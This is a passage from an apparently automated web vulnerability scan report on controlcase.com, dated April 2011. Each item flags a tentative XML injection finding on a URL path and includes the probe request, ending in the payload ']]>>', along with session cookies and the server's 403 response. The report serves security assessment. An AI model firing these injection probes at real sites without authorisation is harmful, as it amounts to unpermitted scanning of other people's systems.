GET /industry_merchant_vulnerability_scans.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:23:24 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.47. http://controlcase.com/it-grc.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /it-grc.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /it-grc.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:19 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.48. http://controlcase.com/it-grc.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /it-grc.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /it-grc.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:28 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.49. http://controlcase.com/js/anylinkmenu.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/anylinkmenu.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/anylinkmenu.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:33 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.50. http://controlcase.com/js/anylinkmenu.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/anylinkmenu.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/anylinkmenu.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:41 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.51. http://controlcase.com/js/banner.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/banner.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/banner.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:20 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.52. http://controlcase.com/js/banner.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/banner.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/banner.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:29 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.53. http://controlcase.com/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/jquery.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/jquery.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:43 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.54. http://controlcase.com/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/jquery.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/jquery.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:52 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.55. http://controlcase.com/js/md5.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/md5.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/md5.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/logon_page.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485; PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:23:45 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.56. http://controlcase.com/js/md5.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/md5.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/md5.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/logon_page.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485; PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:01 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.57. http://controlcase.com/js/menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/menu.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/menu.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:21 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.58. http://controlcase.com/js/menu.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/menu.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/menu.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:30 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.59. http://controlcase.com/js/menucontents.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/menucontents.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/menucontents.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:21 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.60. http://controlcase.com/js/menucontents.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/menucontents.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/menucontents.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:30 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.61. http://controlcase.com/js/special_functions.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/special_functions.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/special_functions.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/contact.php?subject=Contact%20ControlCase
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485; PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:49 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.62. http://controlcase.com/js/special_functions.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /js/special_functions.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/special_functions.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/contact.php?subject=Contact%20ControlCase
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485; PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:23:03 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.63. http://controlcase.com/managed_compliance_application_reviews.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_application_reviews.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_application_reviews.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664507.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.7.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:14:52 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.64. http://controlcase.com/managed_compliance_application_training.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_application_training.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_application_training.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:21:55 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.65. http://controlcase.com/managed_compliance_discovery_scans.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_discovery_scans.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_discovery_scans.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
